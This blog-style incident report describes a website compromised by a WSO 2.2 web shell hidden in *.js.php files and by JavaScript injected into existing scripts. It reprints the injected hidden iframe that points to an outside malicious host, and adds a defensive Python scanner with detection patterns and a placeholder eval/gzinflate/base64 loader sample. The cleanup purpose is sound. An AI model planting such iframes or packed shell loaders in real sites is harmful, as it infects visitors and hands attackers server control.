A client recently gave me a call saying his website was throwing a malware warning when visited using Google Chrome.
A bit of research indicated that somehow the attacker gained access to the site, installed a Web Shell script in *.js.php files and injected JS code into existing JS files.
Google’s Webmaster Tools showed the injected code in the JS file:
The above code, once processed, created an iframe that led to another site that perhaps contained malicious code:
<iframe frameborder="0" width="10" height="10" src="http://brunno.in/showthread.php?t=37220338"></iframe>
The other file, *.js.php, is gzipped and base64 encoded. When inflated and decoded, it turns out to be a Web Shell script, more specifically WSO 2.2. This allows the attacker to access and perform server-based functions from the browser and easily insert malicious code.
You can find the inflated and decoded code here: WSO 2.2
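For cleanup, the two indicators described above (the `*.js.php` double extension and a gzipped, base64-encoded body) can be searched for across the web root, and the blob unpacked for reading without running any PHP. This is an added example, not code from the original post. It assumes the loader uses PHP's usual `gzinflate(base64_decode('...'))` style of call, and the file names and sample payload are constructed.

```python
import base64, os, re, tempfile, zlib

# Assumption: the loader uses PHP's usual unpack idiom, e.g. gzinflate(base64_decode('...')).
PACKED = re.compile(
    r"(gzinflate|gzuncompress|gzdecode)\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]")
# zlib wbits matching each PHP function: raw deflate, zlib, gzip.
WBITS = {"gzinflate": -15, "gzuncompress": 15, "gzdecode": 31}

def unpack_static(php_source):
    """Decode and inflate the embedded blob without executing any PHP."""
    m = PACKED.search(php_source)
    if not m:
        return None
    raw = base64.b64decode(m.group(2))
    try:
        return zlib.decompress(raw, WBITS[m.group(1)]).decode("utf-8", "replace")
    except zlib.error:
        return None  # pattern matched but the blob is not valid compressed data

def scan_webroot(root):
    """Return {relative_path: [reasons]} for PHP files matching the indicators."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            reasons = []
            if name.lower().endswith(".js.php"):
                reasons.append("double extension .js.php")
            with open(path, encoding="utf-8", errors="replace") as fh:
                if PACKED.search(fh.read()):
                    reasons.append("compressed+base64 payload")
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings

def build_constructed_sample(root):
    """Constructed, harmless test data: one packed *.js.php file, one clean PHP file."""
    body = b"<?php /* constructed placeholder, not real shell code */ ?>"
    comp = zlib.compressobj(wbits=-15)  # raw deflate, the format gzinflate() reads
    blob = base64.b64encode(comp.compress(body) + comp.flush()).decode()
    with open(os.path.join(root, "jquery.js.php"), "w") as fh:
        fh.write("<?php eval(gzinflate(base64_decode('%s'))); ?>" % blob)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        build_constructed_sample(d)
        print(scan_webroot(d))
```

Pointing `scan_webroot` at a copy of the site's document root lists the files to review, and `unpack_static` shows what each flagged file would have executed.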